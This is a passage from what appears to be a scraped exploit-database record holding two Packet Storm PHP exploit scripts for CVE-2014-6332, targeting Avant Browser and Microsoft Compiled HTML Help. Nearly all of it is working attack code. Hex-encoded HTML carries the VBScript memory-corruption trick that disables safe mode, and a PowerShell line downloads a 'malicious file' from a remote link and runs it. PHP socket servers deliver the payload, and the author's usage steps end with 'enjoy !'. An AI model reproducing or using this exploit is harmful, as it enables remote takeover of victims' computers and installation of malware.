x3D\\x74\\x65\\x73\\x74\\x61\\x61\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x6E\\x75\\x6C\\x6C\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x69\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x36\\x2E\\x33\\x36\\x35\\x39\\x38\\x37\\x33\\x37\\x34\\x33\\x37\\x38\\x30\\x31\\x45\\x2D\\x33\\x31\\x34\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x37\\x34\\x30\\x38\\x38\\x35\\x33\\x34\\x37\\x33\\x31\\x33\\x32\\x34\\x45\\x2D\\x33\\x31\\x30\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x3D\\x61\\x61\\x28\\x61\\x31\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x38\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x31\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x33\\x34\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x66\\x6F\\x72\\x20\\x6B\\x3D\\x30\\x20\\x74\\x6F\\x20\\x26\\x68\\x36\\x30\\x20\\x73\\x74\\x65\\x70\\x20\\x34\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x6A\\x3D\\x31\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x28\\x69\\x2B\\x26\\x68\\x31\\x31\\x63\\x2B\\x6B\\x29\\x3D\\x61\\x62\\x28\\x34\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x66\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6E\\x65\\x78\\x74\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x64\\x69\\x6D\\x20\\x74\\x79\\x70\\x65\\x31\\x2C\\x74\\x79\\x70\\x65\\x32\\x2C\\x74\\x79\\x70\\x65\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x30\\x3D\\x61\\x30\\x2B\\x61\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x31\\x3D\\x61\\x30\\x2B\\x32\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x32\\x3D\\x61\\x30\\x2B\\x26\\x68\\x38\\x30\\x30\\x30\\x30\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x3D\\x31\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6D\\x65\\x6D\\x3D\\x63\\x69\\x6E\\x74\\x28\\x61\\x30\\x2B\\x31\\x29\\x2A\\x31\\x36\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x28\\x6A\\x3D\\x6D\\x65\\x6D\\x2B\\x34\\x29\\x20\\x6F\\x72\\x20\\x28\\x6A\\x2A\\x38\\x3D\\x6D\\x65\\x6D\\x2B\\x38\\x29\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x32\\x66\\x36\\x36\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x42\\x39\\x41\\x44\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6D\\x28\\x61\\x64\\x64\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x61\\x64\\x64\\x2B\\x34\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6D\\x3D\\x6C\\x65\\x6E\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x3C\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x3C\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x41\\x76\\x61\\x6E\\x74\\x20\\x42\\x72\\x6F\\x77\\x73\\x65\\x72\\x20\\x52\\x65\\x6D\\x6F\\x74\\x65\\x20\\x43\\x6F\\x64\\x65\\x20\\x45\\x78\\x65\\x63\\x75\\x74\\x69\\x6F\\x6E\\x20\\x44\\x65\\x6D\\x6F\\x3C\\x2F\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x0D\\x0A\\x20\\x3C\\x69\\x3E\\x45\\x68\\x73\\x61\\x6E\\x20\\x4E\\x6F\\x72\\x65\\x64\\x64\\x69\\x6E\\x69\\x20\\x2D\\x20\\x40\\x70\\x72\\x6F\\x74\\x33\\x63\\x74\\x30\\x72\\x3C\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x3C\\x69\\x3E\\x65\\x68\\x73\\x61\\x6E\\x6E\\x2E\\x69\\x6E\\x66\\x6F\\x3C\\x2F\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x2F\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x3C\\x2F\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x74\\x6D\\x6C\\x3E\"; \n$msgd=str_replace(\"DOWNLOAD\",$link,$msgd); \nfor (;;) { \nif ($client = @socket_accept($socket)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134062/htmlcompiler-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:21:02", "description": "", "cvss3": {}, "published": "2015-10-23T00:00:00", "type": "packetstorm", "title": "Microsoft Compiled HTML Help Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-10-23T00:00:00", "id": "PACKETSTORM:134064", "href": "https://packetstormsecurity.com/files/134064/Microsoft-Compiled-HTML-Help-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n########################################################## \n# Author : Ehsan Noreddini \n# E-Mail : me@ehsann.info \n# Social : @prot3ct0r \n# Title : Microsoft Compiled HTML Help - Remote Code Execution \n# Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. \n# Version : All \n# Date : 23 October 2015 \n# CVE : CVE2014-6332 \n# Tested on : Windows7 \n########################################################## \n# 1. run php code : php exploit.php \n# 2. convert the loader.html file to a chm file using chmProcessor. \n# 3. open the output. \n# 4. enjoy ! \n########################################################## \n# loader.html: \n# <html><head><title>poc</title><META http-equiv=\"refresh\" content=\"0;URL=http://[Your IP Address]\"></head><body>Ehsan Noreddini</body></html> \n########################################################## \n# shot : http://ehsann.info/proof/Microsoft_Compiled_HTML_help_R_C_E.png \n# Original Code : http://ehsann.info/exploit/5.txt \n# video : http://ehsann.info/video/Microsoft_Compiled_HTML_help_R_C_E.mp4 \n########################################################## \n \nprint \"Microsoft Compiled HTML Help - Remote Code Execution Exploit \\r\\n\"; \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your malicious file \n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($socket, 0,$port); \nsocket_listen($socket); \n# MS14-064 \n$exp = \"\\x3C\\x68\\x74\\x6D\\x6C\\x3E\\x0D\\x0A\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\\x71\\x75\\x69\\x76\\x3D\\x22\\x58\\x2D\\x55\\x41\\x2D\\x43\\x6F\\x6D\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\\x49\\x45\\x3D\\x45\\x6D\\x75\\x6C\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3E\\x0D\\x0A\\x3C\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6C\\x6C\\x3D\\x63\\x72\\x65\\x61\\x74\\x65\\x6F\\x62\\x6A\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x22\\x29\\x0D\\x0A\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x3D\\x22\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x2D\\x45\\x78\\x70\\x72\\x65\\x73\\x73\\x69\\x6F\\x6E\\x20\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\\x6D\\x2E\\x4E\\x65\\x74\\x2E\\x57\\x65\\x62\\x43\\x6C\\x69\\x65\\x6E\\x74\\x29\\x2E\\x44\\x6F\\x77\\x6E\\x6C\\x6F\\x61\\x64\\x46\\x69\\x6C\\x65\\x28\\x27\\x44\\x4F\\x57\\x4E\\x4C\\x4F\\x41\\x44\\x27\\x2C\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x2D\\x63\\x6F\\x6D\\x20\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x29\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x22\\x0D\\x0A\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\\x6F\\x77\\x65\\x72\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x65\\x78\\x65\\x22\\x2C\\x20\\x22\\x2D\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x2C\\x20\\x22\\x22\\x2C\\x20\\x22\\x72\\x75\\x6E\\x61\\x73\\x22\\x2C\\x20\\x30\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x30\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x31\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x32\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x33\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x72\\x6E\\x64\\x61\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x6C\\x61\\x73\\x73\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x0D\\x0A\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A